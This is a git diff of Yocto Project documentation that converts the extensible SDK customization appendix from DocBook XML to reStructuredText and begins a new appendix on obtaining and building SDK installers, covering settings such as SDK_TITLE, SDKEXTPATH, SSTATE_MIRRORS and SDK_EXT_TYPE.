+ state <overview-manual/overview-manual-concepts:shared state cache>` tasks (i.e. the
+ output of the task is saved to and can be restored from the shared
+ state cache) or ensuring the tasks are able to be produced quickly
+ from a task that is a shared state task, add the task name to the
+ value of
+ :term:`SDK_RECRDEP_TASKS`.
+
+ - Disable the tasks if they are added by a class and you do not need
+ the functionality the class provides in the extensible SDK. To
+ disable the tasks, add the class to the ``SDK_INHERIT_BLACKLIST``
+ variable as described in the previous section.
+
+- Generally, you want to have a shared state mirror set up so users of
+ the SDK can add additional items to the SDK after installation
+ without needing to build the items from source. See the "`Providing
+ Additional Installable Extensible SDK
+ Content <#sdk-providing-additional-installable-extensible-sdk-content>`__"
+ section for information.
+
+- If you want users of the SDK to be able to easily update the SDK, you
+ need to set the
+ :term:`SDK_UPDATE_URL`
+ variable. For more information, see the "`Providing Updates to the
+ Extensible SDK After
+ Installation <#sdk-providing-updates-to-the-extensible-sdk-after-installation>`__"
+ section.
+
+- If you have adjusted the list of files and directories that appear in
+ :term:`COREBASE` (other than
+ layers that are enabled through ``bblayers.conf``), then you must
+ list these files in
+ :term:`COREBASE_FILES` so
+ that the files are copied into the SDK.
+
+- If your OpenEmbedded build system setup uses a different environment
+ setup script other than
+ :ref:`structure-core-script`, then you must
+ set
+ :term:`OE_INIT_ENV_SCRIPT`
+ to point to the environment setup script you use.
+
+ .. note::
+
+ You must also reflect this change in the value used for the
+ COREBASE_FILES
+ variable as previously described.
+
+Changing the Extensible SDK Installer Title
+===========================================
+
+You can change the displayed title for the SDK installer by setting the
+:term:`SDK_TITLE` variable and then
+rebuilding the the SDK installer. For information on how to build an SDK
+installer, see the "`Building an SDK
+Installer <#sdk-building-an-sdk-installer>`__" section.
+
+By default, this title is derived from
+:term:`DISTRO_NAME` when it is
+set. If the ``DISTRO_NAME`` variable is not set, the title is derived
+from the :term:`DISTRO` variable.
+
+The
+:ref:`populate_sdk_base <ref-classes-populate-sdk-*>`
+class defines the default value of the ``SDK_TITLE`` variable as
+follows:
+::
+
+ SDK_TITLE ??= "${@d.getVar('DISTRO_NAME') or d.getVar('DISTRO')} SDK"
+
+While several ways exist to change this variable, an efficient method is
+to set the variable in your distribution's configuration file. Doing so
+creates an SDK installer title that applies across your distribution. As
+an example, assume you have your own layer for your distribution named
+"meta-mydistro" and you are using the same type of file hierarchy as
+does the default "poky" distribution. If so, you could update the
+``SDK_TITLE`` variable in the
+``~/meta-mydistro/conf/distro/mydistro.conf`` file using the following
+form:
+::
+
+ SDK_TITLE = "your_title"
+
+Providing Updates to the Extensible SDK After Installation
+==========================================================
+
+When you make changes to your configuration or to the metadata and if
+you want those changes to be reflected in installed SDKs, you need to
+perform additional steps. These steps make it possible for anyone using
+the installed SDKs to update the installed SDKs by using the
+``devtool sdk-update`` command:
+
+1. Create a directory that can be shared over HTTP or HTTPS. You can do
+ this by setting up a web server such as an `Apache HTTP
+ Server <https://en.wikipedia.org/wiki/Apache_HTTP_Server>`__ or
+ `Nginx <https://en.wikipedia.org/wiki/Nginx>`__ server in the cloud
+ to host the directory. This directory must contain the published SDK.
+
+2. Set the
+ :term:`SDK_UPDATE_URL`
+ variable to point to the corresponding HTTP or HTTPS URL. Setting
+ this variable causes any SDK built to default to that URL and thus,
+ the user does not have to pass the URL to the ``devtool sdk-update``
+ command as described in the "`Applying Updates to an Installed
+ Extensible
+ SDK <#sdk-applying-updates-to-an-installed-extensible-sdk>`__"
+ section.
+
+3. Build the extensible SDK normally (i.e., use the
+ ``bitbake -c populate_sdk_ext`` imagename command).
+
+4. Publish the SDK using the following command:
+ ::
+
+ $ oe-publish-sdk some_path/sdk-installer.sh path_to_shared_http_directory
+
+ You must
+ repeat this step each time you rebuild the SDK with changes that you
+ want to make available through the update mechanism.
+
+Completing the above steps allows users of the existing installed SDKs
+to simply run ``devtool sdk-update`` to retrieve and apply the latest
+updates. See the "`Applying Updates to an Installed Extensible
+SDK <#sdk-applying-updates-to-an-installed-extensible-sdk>`__" section
+for further information.
+
+Changing the Default SDK Installation Directory
+===============================================
+
+When you build the installer for the Extensible SDK, the default
+installation directory for the SDK is based on the
+:term:`DISTRO` and
+:term:`SDKEXTPATH` variables from
+within the
+:ref:`populate_sdk_base <ref-classes-populate-sdk-*>`
+class as follows:
+::
+
+ SDKEXTPATH ??= "~/${@d.getVar('DISTRO')}_sdk"
+
+You can
+change this default installation directory by specifically setting the
+``SDKEXTPATH`` variable.
+
+While a number of ways exist through which you can set this variable,
+the method that makes the most sense is to set the variable in your
+distribution's configuration file. Doing so creates an SDK installer
+default directory that applies across your distribution. As an example,
+assume you have your own layer for your distribution named
+"meta-mydistro" and you are using the same type of file hierarchy as
+does the default "poky" distribution. If so, you could update the
+``SDKEXTPATH`` variable in the
+``~/meta-mydistro/conf/distro/mydistro.conf`` file using the following
+form:
+::
+
+ SDKEXTPATH = "some_path_for_your_installed_sdk"
+
+After building your installer, running it prompts the user for
+acceptance of the some_path_for_your_installed_sdk directory as the
+default location to install the Extensible SDK.
+
+Providing Additional Installable Extensible SDK Content
+=======================================================
+
+If you want the users of an extensible SDK you build to be able to add
+items to the SDK without requiring the users to build the items from
+source, you need to do a number of things:
+
+1. Ensure the additional items you want the user to be able to install
+ are already built:
+
+ - Build the items explicitly. You could use one or more "meta"
+ recipes that depend on lists of other recipes.
+
+ - Build the "world" target and set
+ ``EXCLUDE_FROM_WORLD_pn-``\ recipename for the recipes you do not
+ want built. See the
+ :term:`EXCLUDE_FROM_WORLD`
+ variable for additional information.
+
+2. Expose the ``sstate-cache`` directory produced by the build.
+ Typically, you expose this directory by making it available through
+ an `Apache HTTP
+ Server <https://en.wikipedia.org/wiki/Apache_HTTP_Server>`__ or
+ `Nginx <https://en.wikipedia.org/wiki/Nginx>`__ server.
+
+3. Set the appropriate configuration so that the produced SDK knows how
+ to find the configuration. The variable you need to set is
+ :term:`SSTATE_MIRRORS`:
+ ::
+
+ SSTATE_MIRRORS = "file://.* http://example.com/some_path/sstate-cache/PATH"
+
+ You can set the
+ ``SSTATE_MIRRORS`` variable in two different places:
+
+ - If the mirror value you are setting is appropriate to be set for
+ both the OpenEmbedded build system that is actually building the
+ SDK and the SDK itself (i.e. the mirror is accessible in both
+ places or it will fail quickly on the OpenEmbedded build system
+ side, and its contents will not interfere with the build), then
+ you can set the variable in your ``local.conf`` or custom distro
+ configuration file. You can then "whitelist" the variable through
+ to the SDK by adding the following:
+ ::
+
+ SDK_LOCAL_CONF_WHITELIST = "SSTATE_MIRRORS"
+
+ - Alternatively, if you just want to set the ``SSTATE_MIRRORS``
+ variable's value for the SDK alone, create a
+ ``conf/sdk-extra.conf`` file either in your
+ :term:`Build Directory` or within any
+ layer and put your ``SSTATE_MIRRORS`` setting within that file.
+
+ .. note::
+
+ This second option is the safest option should you have any
+ doubts as to which method to use when setting
+ SSTATE_MIRRORS
+ .
+
+Minimizing the Size of the Extensible SDK Installer Download
+============================================================
+
+By default, the extensible SDK bundles the shared state artifacts for
+everything needed to reconstruct the image for which the SDK was built.
+This bundling can lead to an SDK installer file that is a Gigabyte or
+more in size. If the size of this file causes a problem, you can build
+an SDK that has just enough in it to install and provide access to the
+``devtool command`` by setting the following in your configuration:
+::
+
+ SDK_EXT_TYPE = "minimal"
+
+Setting
+:term:`SDK_EXT_TYPE` to
+"minimal" produces an SDK installer that is around 35 Mbytes in size,
+which downloads and installs quickly. You need to realize, though, that
+the minimal installer does not install any libraries or tools out of the
+box. These libraries and tools must be installed either "on the fly" or
+through actions you perform using ``devtool`` or explicitly with the
+``devtool sdk-install`` command.
+
+In most cases, when building a minimal SDK you need to also enable
+bringing in the information on a wider range of packages produced by the
+system. Requiring this wider range of information is particularly true
+so that ``devtool add`` is able to effectively map dependencies it
+discovers in a source tree to the appropriate recipes. Additionally, the
+information enables the ``devtool search`` command to return useful
+results.
+
+To facilitate this wider range of information, you would need to set the
+following:
+::
+
+ SDK_INCLUDE_PKGDATA = "1"
+
+See the :term:`SDK_INCLUDE_PKGDATA` variable for additional information.
+
+Setting the ``SDK_INCLUDE_PKGDATA`` variable as shown causes the "world"
+target to be built so that information for all of the recipes included
+within it are available. Having these recipes available increases build
+time significantly and increases the size of the SDK installer by 30-80
+Mbytes depending on how many recipes are included in your configuration.
+
+You can use ``EXCLUDE_FROM_WORLD_pn-``\ recipename for recipes you want
+to exclude. However, it is assumed that you would need to be building
+the "world" target if you want to provide additional items to the SDK.
+Consequently, building for "world" should not represent undue overhead
+in most cases.
+
+.. note::
+
+ If you set
+ SDK_EXT_TYPE
+ to "minimal", then providing a shared state mirror is mandatory so
+ that items can be installed as needed. See the "
+ Providing Additional Installable Extensible SDK Content
+ " section for more information.
+
+You can explicitly control whether or not to include the toolchain when
+you build an SDK by setting the
+:term:`SDK_INCLUDE_TOOLCHAIN`
+variable to "1". In particular, it is useful to include the toolchain
+when you have set ``SDK_EXT_TYPE`` to "minimal", which by default,
+excludes the toolchain. Also, it is helpful if you are building a small
+SDK for use with an IDE or some other tool where you do not want to take
+extra steps to install a toolchain.
diff --git a/documentation/sdk-manual/sdk-appendix-customizing.xml b/documentation/sdk-manual/sdk-appendix-customizing.xml
deleted file mode 100644
index 911658f914..0000000000
--- a/documentation/sdk-manual/sdk-appendix-customizing.xml
+++ /dev/null
@@ -1,514 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<appendix id='sdk-appendix-customizing'>
-
-<title>Customizing the Extensible SDK</title>
-
-<para>
- This appendix describes customizations you can apply to the extensible SDK.
-</para>
-
-<section id='sdk-configuring-the-extensible-sdk'>
- <title>Configuring the Extensible SDK</title>
-
- <para>
- The extensible SDK primarily consists of a pre-configured copy of
- the OpenEmbedded build system from which it was produced.
- Thus, the SDK's configuration is derived using that build system and
- the filters shown in the following list.
- When these filters are present, the OpenEmbedded build system applies
- them against <filename>local.conf</filename> and
- <filename>auto.conf</filename>:
- <itemizedlist>
- <listitem><para>
- Variables whose values start with "/" are excluded since the
- assumption is that those values are paths that are likely to
- be specific to the
- <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>build host</ulink>.
- </para></listitem>
- <listitem><para>
- Variables listed in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_LOCAL_CONF_BLACKLIST'><filename>SDK_LOCAL_CONF_BLACKLIST</filename></ulink>
- are excluded.
- These variables are not allowed through from the OpenEmbedded
- build system configuration into the extensible SDK
- configuration.
- Typically, these variables are specific to the machine on
- which the build system is running and could be problematic
- as part of the extensible SDK configuration.</para>
-
- <para>For a list of the variables excluded by default, see the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_LOCAL_CONF_BLACKLIST'><filename>SDK_LOCAL_CONF_BLACKLIST</filename></ulink>
- in the glossary of the Yocto Project Reference Manual.
- </para></listitem>
- <listitem><para>
- Variables listed in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_LOCAL_CONF_WHITELIST'><filename>SDK_LOCAL_CONF_WHITELIST</filename></ulink>
- are included.
- Including a variable in the value of
- <filename>SDK_LOCAL_CONF_WHITELIST</filename> overrides either
- of the previous two filters.
- The default value is blank.
- </para></listitem>
- <listitem><para>
- Classes inherited globally with
- <ulink url='&YOCTO_DOCS_REF_URL;#var-INHERIT'><filename>INHERIT</filename></ulink>
- that are listed in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_INHERIT_BLACKLIST'><filename>SDK_INHERIT_BLACKLIST</filename></ulink>
- are disabled.
- Using <filename>SDK_INHERIT_BLACKLIST</filename> to disable
- these classes is the typical method to disable classes that
- are problematic or unnecessary in the SDK context.
- The default value blacklists the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-buildhistory'><filename>buildhistory</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-icecc'><filename>icecc</filename></ulink>
- classes.
- </para></listitem>
- </itemizedlist>
- Additionally, the contents of <filename>conf/sdk-extra.conf</filename>,
- when present, are appended to the end of
- <filename>conf/local.conf</filename> within the produced SDK, without
- any filtering.
- The <filename>sdk-extra.conf</filename> file is particularly useful
- if you want to set a variable value just for the SDK and not the
- OpenEmbedded build system used to create the SDK.
- </para>
-</section>
-
-<section id='adjusting-the-extensible-sdk-to-suit-your-build-hosts-setup'>
- <title>Adjusting the Extensible SDK to Suit Your Build Host's Setup</title>
-
- <para>
- In most cases, the extensible SDK defaults should work with your
- <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>build host's</ulink>
- setup.
- However, some cases exist for which you might consider making
- adjustments:
- <itemizedlist>
- <listitem><para>
- If your SDK configuration inherits additional classes
- using the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-INHERIT'><filename>INHERIT</filename></ulink>
- variable and you do not need or want those classes enabled in
- the SDK, you can blacklist them by adding them to the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_INHERIT_BLACKLIST'><filename>SDK_INHERIT_BLACKLIST</filename></ulink>
- variable as described in the fourth bullet of the previous
- section.
- <note>
- The default value of
- <filename>SDK_INHERIT_BLACKLIST</filename> is set using
- the "?=" operator.
- Consequently, you will need to either define the entire
- list by using the "=" operator, or you will need to append
- a value using either "_append" or the "+=" operator.
- You can learn more about these operators in the
- "<ulink url='&YOCTO_DOCS_BB_URL;#basic-syntax'>Basic Syntax</ulink>"
- section of the BitBake User Manual.
- </note>.
- </para></listitem>
- <listitem><para>
- If you have classes or recipes that add additional tasks to
- the standard build flow (i.e. the tasks execute as the recipe
- builds as opposed to being called explicitly), then you need
- to do one of the following:
- <itemizedlist>
- <listitem><para>
- After ensuring the tasks are
- <ulink url='&YOCTO_DOCS_OM_URL;#shared-state-cache'>shared state</ulink>
- tasks (i.e. the output of the task is saved to and
- can be restored from the shared state cache) or
- ensuring the tasks are able to be produced quickly from
- a task that is a shared state task, add the task name
- to the value of
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_RECRDEP_TASKS'><filename>SDK_RECRDEP_TASKS</filename></ulink>.
- </para></listitem>
- <listitem><para>
- Disable the tasks if they are added by a class and
- you do not need the functionality the class provides
- in the extensible SDK.
- To disable the tasks, add the class to the
- <filename>SDK_INHERIT_BLACKLIST</filename> variable
- as described in the previous section.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- Generally, you want to have a shared state mirror set up so
- users of the SDK can add additional items to the SDK after
- installation without needing to build the items from source.
- See the
- "<link linkend='sdk-providing-additional-installable-extensible-sdk-content'>Providing Additional Installable Extensible SDK Content</link>"
- section for information.
- </para></listitem>
- <listitem><para>
- If you want users of the SDK to be able to easily update the
- SDK, you need to set the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_UPDATE_URL'><filename>SDK_UPDATE_URL</filename></ulink>
- variable.
- For more information, see the
- "<link linkend='sdk-providing-updates-to-the-extensible-sdk-after-installation'>Providing Updates to the Extensible SDK After Installation</link>"
- section.
- </para></listitem>
- <listitem><para>
- If you have adjusted the list of files and directories that
- appear in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-COREBASE'><filename>COREBASE</filename></ulink>
- (other than layers that are enabled through
- <filename>bblayers.conf</filename>), then you must list these
- files in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-COREBASE_FILES'><filename>COREBASE_FILES</filename></ulink>
- so that the files are copied into the SDK.
- </para></listitem>
- <listitem><para>
- If your OpenEmbedded build system setup uses a different
- environment setup script other than
- <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>,
- then you must set
- <ulink url='&YOCTO_DOCS_REF_URL;#var-OE_INIT_ENV_SCRIPT'><filename>OE_INIT_ENV_SCRIPT</filename></ulink>
- to point to the environment setup script you use.
- <note>
- You must also reflect this change in the value used for the
- <filename>COREBASE_FILES</filename> variable as previously
- described.
- </note>
- </para></listitem>
- </itemizedlist>
- </para>
-</section>
-
-<section id='sdk-changing-the-sdk-installer-title'>
- <title>Changing the Extensible SDK Installer Title</title>
-
- <para>
- You can change the displayed title for the SDK installer by setting
- the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_TITLE'><filename>SDK_TITLE</filename></ulink>
- variable and then rebuilding the the SDK installer.
- For information on how to build an SDK installer, see the
- "<link linkend='sdk-building-an-sdk-installer'>Building an SDK Installer</link>"
- section.
- </para>
-
- <para>
- By default, this title is derived from
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_NAME'><filename>DISTRO_NAME</filename></ulink>
- when it is set.
- If the <filename>DISTRO_NAME</filename> variable is not set, the title
- is derived from the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO'><filename>DISTRO</filename></ulink>
- variable.
- </para>
-
- <para>
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-populate-sdk-*'><filename>populate_sdk_base</filename></ulink>
- class defines the default value of the <filename>SDK_TITLE</filename>
- variable as follows:
- <literallayout class='monospaced'>
- SDK_TITLE ??= "${@d.getVar('DISTRO_NAME') or d.getVar('DISTRO')} SDK"
- </literallayout>
- </para>
-
- <para>
- While several ways exist to change this variable, an efficient method
- is to set the variable in your distribution's configuration file.
- Doing so creates an SDK installer title that applies across your
- distribution.
- As an example, assume you have your own layer for your distribution
- named "meta-mydistro" and you are using the same type of file
- hierarchy as does the default "poky" distribution.
- If so, you could update the <filename>SDK_TITLE</filename> variable
- in the
- <filename>~/meta-mydistro/conf/distro/mydistro.conf</filename> file
- using the following form:
- <literallayout class='monospaced'>
- SDK_TITLE = "<replaceable>your_title</replaceable>"
- </literallayout>
- </para>
-</section>
-
-<section id='sdk-providing-updates-to-the-extensible-sdk-after-installation'>
- <title>Providing Updates to the Extensible SDK After Installation</title>
-
- <para>
- When you make changes to your configuration or to the metadata and
- if you want those changes to be reflected in installed SDKs, you need
- to perform additional steps.
- These steps make it possible for anyone using the installed SDKs to
- update the installed SDKs by using the
- <filename>devtool sdk-update</filename> command:
- <orderedlist>
- <listitem><para>
- Create a directory that can be shared over HTTP or HTTPS.
- You can do this by setting up a web server such as an
- <ulink url='https://en.wikipedia.org/wiki/Apache_HTTP_Server'>Apache HTTP Server</ulink>
- or
- <ulink url='https://en.wikipedia.org/wiki/Nginx'>Nginx</ulink>
- server in the cloud to host the directory.
- This directory must contain the published SDK.
- </para></listitem>
- <listitem><para>
- Set the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_UPDATE_URL'><filename>SDK_UPDATE_URL</filename></ulink>
- variable to point to the corresponding HTTP or HTTPS URL.
- Setting this variable causes any SDK built to default to that
- URL and thus, the user does not have to pass the URL to the
- <filename>devtool sdk-update</filename> command as described
- in the
- "<link linkend='sdk-applying-updates-to-an-installed-extensible-sdk'>Applying Updates to an Installed Extensible SDK</link>"
- section.
- </para></listitem>
- <listitem><para>
- Build the extensible SDK normally (i.e., use the
- <filename>bitbake -c populate_sdk_ext</filename> <replaceable>imagename</replaceable>
- command).
- </para></listitem>
- <listitem><para>
- Publish the SDK using the following command:
- <literallayout class='monospaced'>
- $ oe-publish-sdk <replaceable>some_path</replaceable>/sdk-installer.sh <replaceable>path_to_shared_http_directory</replaceable>
- </literallayout>
- You must repeat this step each time you rebuild the SDK
- with changes that you want to make available through the
- update mechanism.
- </para></listitem>
- </orderedlist>
- </para>
-
- <para>
- Completing the above steps allows users of the existing installed
- SDKs to simply run <filename>devtool sdk-update</filename> to
- retrieve and apply the latest updates.
- See the
- "<link linkend='sdk-applying-updates-to-an-installed-extensible-sdk'>Applying Updates to an Installed Extensible SDK</link>"
- section for further information.
- </para>
-</section>
-
-<section id='sdk-changing-the-default-sdk-installation-directory'>
- <title>Changing the Default SDK Installation Directory</title>
-
- <para>
- When you build the installer for the Extensible SDK, the default
- installation directory for the SDK is based on the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO'><filename>DISTRO</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDKEXTPATH'><filename>SDKEXTPATH</filename></ulink>
- variables from within the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-populate-sdk-*'><filename>populate_sdk_base</filename></ulink>
- class as follows:
- <literallayout class='monospaced'>
- SDKEXTPATH ??= "~/${@d.getVar('DISTRO')}_sdk"
- </literallayout>
- You can change this default installation directory by specifically
- setting the <filename>SDKEXTPATH</filename> variable.
- </para>
-
- <para>
- While a number of ways exist through which you can set this variable,
- the method that makes the most sense is to set the variable in your
- distribution's configuration file.
- Doing so creates an SDK installer default directory that applies
- across your distribution.
- As an example, assume you have your own layer for your distribution
- named "meta-mydistro" and you are using the same type of file
- hierarchy as does the default "poky" distribution.
- If so, you could update the <filename>SDKEXTPATH</filename> variable
- in the
- <filename>~/meta-mydistro/conf/distro/mydistro.conf</filename> file
- using the following form:
- <literallayout class='monospaced'>
- SDKEXTPATH = "<replaceable>some_path_for_your_installed_sdk</replaceable>"
- </literallayout>
- </para>
-
- <para>
- After building your installer, running it prompts the user for
- acceptance of the
- <replaceable>some_path_for_your_installed_sdk</replaceable> directory
- as the default location to install the Extensible SDK.
- </para>
-</section>
-
-<section id='sdk-providing-additional-installable-extensible-sdk-content'>
- <title>Providing Additional Installable Extensible SDK Content</title>
-
- <para>
- If you want the users of an extensible SDK you build to be
- able to add items to the SDK without requiring the users to build
- the items from source, you need to do a number of things:
- <orderedlist>
- <listitem><para>
- Ensure the additional items you want the user to be able to
- install are already built:
- <itemizedlist>
- <listitem><para>
- Build the items explicitly.
- You could use one or more "meta" recipes that depend
- on lists of other recipes.
- </para></listitem>
- <listitem><para>
- Build the "world" target and set
- <filename>EXCLUDE_FROM_WORLD_pn-</filename><replaceable>recipename</replaceable>
- for the recipes you do not want built.
- See the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-EXCLUDE_FROM_WORLD'><filename>EXCLUDE_FROM_WORLD</filename></ulink>
- variable for additional information.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- Expose the <filename>sstate-cache</filename> directory
- produced by the build.
- Typically, you expose this directory by making it available
- through an
- <ulink url='https://en.wikipedia.org/wiki/Apache_HTTP_Server'>Apache HTTP Server</ulink>
- or
- <ulink url='https://en.wikipedia.org/wiki/Nginx'>Nginx</ulink>
- server.
- </para></listitem>
- <listitem><para>
- Set the appropriate configuration so that the produced SDK
- knows how to find the configuration.
- The variable you need to set is
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SSTATE_MIRRORS'><filename>SSTATE_MIRRORS</filename></ulink>:
- <literallayout class='monospaced'>
- SSTATE_MIRRORS = "file://.* http://<replaceable>example</replaceable>.com/<replaceable>some_path</replaceable>/sstate-cache/PATH"
- </literallayout>
- You can set the <filename>SSTATE_MIRRORS</filename> variable
- in two different places:
- <itemizedlist>
- <listitem><para>
- If the mirror value you are setting is appropriate to
- be set for both the OpenEmbedded build system that is
- actually building the SDK and the SDK itself (i.e. the
- mirror is accessible in both places or it will fail
- quickly on the OpenEmbedded build system side, and its
- contents will not interfere with the build), then you
- can set the variable in your
- <filename>local.conf</filename> or custom distro
- configuration file.
- You can then "whitelist" the variable through
- to the SDK by adding the following:
- <literallayout class='monospaced'>
- SDK_LOCAL_CONF_WHITELIST = "SSTATE_MIRRORS"
- </literallayout>
- </para></listitem>
- <listitem><para>
- Alternatively, if you just want to set the
- <filename>SSTATE_MIRRORS</filename> variable's value
- for the SDK alone, create a
- <filename>conf/sdk-extra.conf</filename> file either in
- your
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
- or within any layer and put your
- <filename>SSTATE_MIRRORS</filename> setting within
- that file.
- <note>
- This second option is the safest option should
- you have any doubts as to which method to use when
- setting <filename>SSTATE_MIRRORS</filename>.
- </note>
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- </orderedlist>
- </para>
-</section>
-
-<section id='sdk-minimizing-the-size-of-the-extensible-sdk-installer-download'>
- <title>Minimizing the Size of the Extensible SDK Installer Download</title>
-
- <para>
- By default, the extensible SDK bundles the shared state artifacts for
- everything needed to reconstruct the image for which the SDK was built.
- This bundling can lead to an SDK installer file that is a Gigabyte or
- more in size.
- If the size of this file causes a problem, you can build an SDK that
- has just enough in it to install and provide access to the
- <filename>devtool command</filename> by setting the following in your
- configuration:
- <literallayout class='monospaced'>
- SDK_EXT_TYPE = "minimal"
- </literallayout>
- Setting
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_EXT_TYPE'><filename>SDK_EXT_TYPE</filename></ulink>
- to "minimal" produces an SDK installer that is around 35 Mbytes in
- size, which downloads and installs quickly.
- You need to realize, though, that the minimal installer does not
- install any libraries or tools out of the box.
- These libraries and tools must be installed either "on the fly" or
- through actions you perform using <filename>devtool</filename> or
- explicitly with the <filename>devtool sdk-install</filename> command.
- </para>
-
- <para>
- In most cases, when building a minimal SDK you need to also enable
- bringing in the information on a wider range of packages produced by
- the system.
- Requiring this wider range of information is particularly true
- so that <filename>devtool add</filename> is able to effectively map
- dependencies it discovers in a source tree to the appropriate recipes.
- Additionally, the information enables the
- <filename>devtool search</filename> command to return useful results.
- </para>
-
- <para>
- To facilitate this wider range of information, you would need to
- set the following:
- <literallayout class='monospaced'>
- SDK_INCLUDE_PKGDATA = "1"
- </literallayout>
- See the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_INCLUDE_PKGDATA'><filename>SDK_INCLUDE_PKGDATA</filename></ulink>
- variable for additional information.
- </para>
-
- <para>
- Setting the <filename>SDK_INCLUDE_PKGDATA</filename> variable as
- shown causes the "world" target to be built so that information
- for all of the recipes included within it are available.
- Having these recipes available increases build time significantly and
- increases the size of the SDK installer by 30-80 Mbytes depending on
- how many recipes are included in your configuration.
- </para>
-
- <para>
- You can use
- <filename>EXCLUDE_FROM_WORLD_pn-</filename><replaceable>recipename</replaceable>
- for recipes you want to exclude.
- However, it is assumed that you would need to be building the "world"
- target if you want to provide additional items to the SDK.
- Consequently, building for "world" should not represent undue
- overhead in most cases.
- <note>
- If you set <filename>SDK_EXT_TYPE</filename> to "minimal",
- then providing a shared state mirror is mandatory so that items
- can be installed as needed.
- See the
- "<link linkend='sdk-providing-additional-installable-extensible-sdk-content'>Providing Additional Installable Extensible SDK Content</link>"
- section for more information.
- </note>
- </para>
-
- <para>
- You can explicitly control whether or not to include the toolchain
- when you build an SDK by setting the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_INCLUDE_TOOLCHAIN'><filename>SDK_INCLUDE_TOOLCHAIN</filename></ulink>
- variable to "1".
- In particular, it is useful to include the toolchain when you
- have set <filename>SDK_EXT_TYPE</filename> to "minimal", which by
- default, excludes the toolchain.
- Also, it is helpful if you are building a small SDK for use with
- an IDE or some
- other tool where you do not want to take extra steps to install a
- toolchain.
- </para>
-</section>
-</appendix>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/sdk-manual/sdk-appendix-obtain.rst b/documentation/sdk-manual/sdk-appendix-obtain.rst
new file mode 100644
index 0000000000..a51c22e399
--- /dev/null
+++ b/documentation/sdk-manual/sdk-appendix-obtain.rst
@@ -0,0 +1,321 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*****************
+Obtaining the SDK
+*****************
+
+.. _sdk-locating-pre-built-sdk-installers:
+
+Locating Pre-Built SDK Installers
+=================================
+
+You can use existing, pre-built toolchains by locating and running an
+SDK installer script that ships with the Yocto Project. Using this
+method, you select and download an architecture-specific SDK installer
+and then run the script to hand-install the toolchain.
+
+Follow these steps to locate and hand-install the toolchain:
+
+1. *Go to the Installers Directory:* Go to
+ :yocto_dl:`/releases/yocto/yocto-3.1.2/toolchain/`
+
+2. *Open the Folder for Your Build Host:* Open the folder that matches
+ your :term:`Build Host` (i.e.
+ ``i686`` for 32-bit machines or ``x86_64`` for 64-bit machines).
+
+3. *Locate and Download the SDK Installer:* You need to find and
+ download the installer appropriate for your build host, target
+ hardware, and image type.
+
+ The installer files (``*.sh``) follow this naming convention:
+ ::
+
+ poky-glibc-host_system-core-image-type-arch-toolchain[-ext]-release.sh
+
+ Where:
+ host_system is a string representing your development system:
+ "i686" or "x86_64"
+
+ type is a string representing the image:
+ "sato" or "minimal"
+
+ arch is a string representing the target architecture:
+ "aarch64", "armv5e", "core2-64", "coretexa8hf-neon", "i586", "mips32r2",
+ "mips64", or "ppc7400"
+
+ release is the version of Yocto Project.
+
+ NOTE:
+ The standard SDK installer does not have the "-ext" string as
+ part of the filename.
+
+
+ The toolchains provided by the Yocto
+ Project are based off of the ``core-image-sato`` and
+ ``core-image-minimal`` images and contain libraries appropriate for
+ developing against those images.
+
+ For example, if your build host is a 64-bit x86 system and you need
+ an extended SDK for a 64-bit core2 target, go into the ``x86_64``
+ folder and download the following installer:
+ ::
+
+ poky-glibc-x86_64-core-image-sato-core2-64-toolchain-ext-DISTRO.sh
+
+4. *Run the Installer:* Be sure you have execution privileges and run
+ the installer. Following is an example from the ``Downloads``
+ directory:
+ ::
+
+ $ ~/Downloads/poky-glibc-x86_64-core-image-sato-core2-64-toolchain-ext-DISTRO.sh
+
+ During execution of the script, you choose the root location for the
+ toolchain. See the "`Installed Standard SDK Directory
+ Structure <#sdk-installed-standard-sdk-directory-structure>`__"
+ section and the "`Installed Extensible SDK Directory
+ Structure <#sdk-installed-extensible-sdk-directory-structure>`__"
+ section for more information.
+
+Building an SDK Installer
+=========================
+
+As an alternative to locating and downloading an SDK installer, you can
+build the SDK installer. Follow these steps:
+
+1. *Set Up the Build Environment:* Be sure you are set up to use BitBake
+ in a shell. See the ":ref:`dev-manual/dev-manual-start:preparing the build host`" section
